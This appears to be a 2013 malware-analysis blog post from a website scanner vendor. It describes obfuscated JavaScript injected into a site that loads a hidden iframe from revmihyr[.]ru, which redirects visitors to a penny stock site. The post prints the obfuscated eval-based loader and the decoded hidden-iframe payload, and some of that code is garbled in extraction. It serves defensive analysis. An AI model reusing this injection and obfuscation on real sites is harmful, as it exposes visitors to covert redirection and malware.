Blacklisted website used to drive traffic to 'penny stock website'


Obfuscated malicious JavaScript code generated hidden iframe to drive traffic to customer website

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Usually, such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This website is located in Ukraine and it is used by Traffic Direction System (TDS) managed by malicious domain revmihyr[.]ru as referrer to 'penny stock' website. Malware scanner detected suspicious JavaScript code injected in website pages. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. This post, in educational purposes, goes with the redirects to find the TDS 'customer'.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Wed May 8 10:51:43 2013

Infected website’s files: 9
Website malware scan report link: http://goo.gl/b0D8j

Quttera | Online Website Malware Scanner

Quttera | Online Website Malware Scanner

Website malware scan report

Quttera | Online Website Malware Scanner

Website malware scan report | Files analysis

9 web pages detected containing malicious JavaScript

Threat Dump

Threat Dump

Decoded malicious javascript



Malware entry


Malware entry details.

Beautified script


  1. = eval;
  2. = "0" + "x";
  3. = 0;
  4. try {
  5.     a &= 2
  6. } catch (q) {
  7.     a = 1
  8. }
  9. if (!a) {
  10.     try {
  11.         document["body"] ^= ~1;
  12.     } catch (q) {
  13.         a2 = "_"
  14.     }
  15.     z ="2f_6d_7c_75_6a_7b_70_76_75_27_2f_......_11_84_30_2f_30_42"["split"](a2);
  16.     s = "";
  17.     for (= 0; i < z.length; i++) {
  18.         s += String["fromCharCode"](e(+ (z[i])) - 5 - 2);
  19.     }
  20.     zaz = s;
  21.     e(zaz);
  22. }



Malicious payload


Decoded payload injects hidden iframe to http://revmihyr.ru/count18.php


  1. (function () {
  2.     var doff = document.createElement('iframe');
  3.     doff.src = 'http://revmihyr.ru/count18.php';
  4.     doff.style.position = 'absolute';
  5.     doff.style.border = '0';
  6.     doff.style.height = '1px';
  7.     doff.style.width = '1px';
  8.     doff.style.left = '1px';
  9.     doff.style.top = '1px';
  10.     if (!document.getElementById('doff')) {
  11.         document.write('
    \'doff\'>
    '
    );
  12.         document.getElementById('doff').appendChild(doff);
  13.     }
  14. })();

At the time this article is being written the .php in payload contains the following redirection:

Malicious redirect

Malicious redirect

Redirect to penny stock website

So in this case we can see that the customer of the TDS is actually some penny stock website that you don't want to visit.

Blacklisting status

The website is Suspicious on Google Safe Browsing.

Google Safe Browsing analysis

Google Safe Browsing analysis


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.